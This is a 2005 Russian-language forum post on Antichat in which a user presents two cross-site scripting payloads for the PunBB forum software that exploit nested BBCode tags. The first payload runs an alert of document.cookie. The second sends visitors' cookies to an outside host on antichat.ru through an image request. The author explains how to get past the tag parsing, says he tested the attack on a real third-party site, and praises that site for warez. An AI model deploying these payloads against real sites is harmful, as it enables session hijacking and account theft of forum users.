ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу XSS в PunBB (вложеные теги)
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

XSS в PunBB (вложеные теги)
  #1  
Старый 31.03.2005, 17:09
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию XSS в PunBB (вложеные теги)
Нашел вложеные теги, сделал видео.

1.
Код:
[еmail=[urл=s=`]a[/urл]]a[/еmail]`xss=`alert(document.cookie);this.xss=null` style=top:expression(eval(this.xss));
2.
Код:
[еmail=[urл=s=`]a[/urл]]a[/еmail]`xss=`i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null` style=top:expression(eval(this.xss));
ВНИМАНИЕ! Намеренно (чтобы теги не парсились) я написал [емейл] через _рускую_ е и url тоже через Л.
Перепешите А НЕ КОПИРУЙТЕ ТЕКСТ!

Проверялось на http://region59.com/forum - между прочим хороший варез - сайт
Последний раз редактировалось KEZ; 31.03.2005 в 17:12..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ